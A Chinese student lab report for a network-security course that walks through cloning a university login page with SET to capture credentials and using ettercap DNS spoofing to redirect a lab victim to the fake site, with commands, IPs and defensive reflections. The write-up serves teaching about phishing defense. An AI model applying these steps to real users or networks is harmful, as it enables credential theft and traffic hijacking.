2018-2019-2 网络对抗技术 20165237 Exp7 网络欺诈防范

2018-2019-2 网络对抗技术 20165237 Exp7 网络欺诈防范


实验目标

  • 本实践的目标理解经常使用网络欺诈背后的原理,以提升防范意识,并提出具体防范方法。具体实践有

(1)简单应用SET工具创建冒名网站 (1分)apache

(2)ettercap DNS spoof (1分)浏览器

(3)结合应用两种技术,用DNS spoof引导特定访问到冒名网站。(1.5分)缓存

(4)请勿使用外部网站作实验

Exp 7.1 简单应用SET工具创建冒名网站

  • 首先使用vi编辑apache配置文件修改端口号
  • 查看80端口状态,如被占用须要kill占用它的进程
  • 开启Apache服务
  • 打开SET工具
sudo vi /etc/apache2/ports.conf
netstat -tupln | grep 80
apachectl start
setoolkit
选择1,社会工程学攻击
选择2,钓鱼网站攻击向量
选择3,登录密码截取攻击
选择2,网站克隆

  • 输入kali的IP:192.168.153.135和要克隆的url:192.168.200.83/cas/login

  • 使用靶机(win2008)浏览器输入kali的IP:192.168.153.135
    安全

  • kali端响应,收到用户名和密码数据:
    服务器


Exp 7.2 ettercap DNS spoof

  • 修改kali网卡为混杂模式
  • 修改DNS缓存表
ifconfig eth0 promisc
vi /etc/ettercap/etter.dns
  • 添加新纪录后保存。即指定靶机经过DNS转换的域名和服务器IP:
    192.168.200.80/cas/login A 192.168.153.135
    网络

  • 打开ettercap
ettercap -G 
Sniff-->unified sniffing指定监听的网卡
Hosts-->Scan for hosts扫描子网
Hosts-->Hosts list查看子网主机列表

  • 将网关IP:192.168.153.2添加到Targert1,将靶机IP:192.168.153.1添加到Targert2:
    工具

  • Plugins-->Manage the plugins-->双击dns_spoof网站

  • start-->start sniffing开始嗅探
  • 靶机经过ping设定的域名,查看是否欺骗成功
    url


Exp 7.3 结合应用两种技术,用DNS spoof引导特定访问到冒名网站

  • 首先同实验第一步,克隆出一个假的教务处登录网站。
  • 在实验二步骤中,将DNS缓存表中将该网站的IP改成kali的IP192.168.153.135,并开始dns_spoof
  • 靶机中直接访问该网站。发现输入www.baidu.com,却出现教务处的网站。

实验感想和问题

  • 感想:网站克隆技术有好的方面也有坏的方面,很容易攻击访问者的电脑。因此之后遇到不安全的网站,尽可能不要点进去,颇有可能就链接到了一个钓鱼网站被盗用了信息。code

  • (1)一般在什么场景下容易受到DNS spoof攻击

    答:不设防的点击连接时(例如朋友提供的,免费WIFI自动打开等)

  • (2)在平常生活工做中如何防范以上两攻击方法

    答:不轻易打开非官方渠道得到的连接;不能随便连wifi。

相关文章
相关标签/搜索